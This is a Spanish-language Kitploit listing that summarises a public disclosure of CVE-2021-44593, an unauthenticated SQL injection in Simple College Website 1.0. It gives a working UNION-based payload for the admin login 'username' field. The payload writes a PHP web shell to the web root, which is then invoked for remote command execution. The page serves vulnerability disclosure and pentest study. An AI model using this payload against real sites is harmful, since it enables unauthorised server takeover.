Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44593 — Divulgación pública y análisis de CVE-2021-44593, una inyección SQL no autenticada en Simple College Website que conduce a la carga arbitraria de archivos y a la ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/mister-joe/cve-2021-44593
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmister-joe/cve-2021-44593

CVE-2021-44593

Divulgación pública y análisis de CVE-2021-44593, una inyección SQL no autenticada en Simple College Website que conduce a la carga arbitraria de archivos y a la ejecución remota de código.

Ver Repositorio
2hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44593

Divulgación pública de CVE-2021-44593. Una vulnerabilidad de inyección SQL/carga arbitraria de archivos/ejecución remota de código en Simple College Website.

DESCRIPCIÓN

Simple College Website 1.0 es vulnerable a una inyección SQL basada en UNION sin autenticación en el parámetro "username" de la página /admin/login.php, que luego puede aprovecharse para cargar archivos arbitrarios y obtener ejecución remota de código.

COMPONENTES AFECTADOS

La función login() en admin_class.php

PASOS PARA REPRODUCIR

  1. Acceda a la página de inicio de sesión de administrador (normalmente /admin/login.php)
  2. Envíe el formulario de inicio de sesión con el parámetro POST "username" que contenga la siguiente inyección SQL basada en UNION:
root@kitploit:~
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -
  1. Navegue a /testing.php?cmd=id

NOTAS

  1. Se necesita conocer la ubicación del directorio raíz del servidor web.
  2. También puede ser necesario conocer la ubicación del directorio raíz de documentos si no es la misma que la del directorio raíz del servidor web.
  3. Además, el demonio de MySQL necesita tener permisos de escritura en dicho directorio.
Descargar herramienta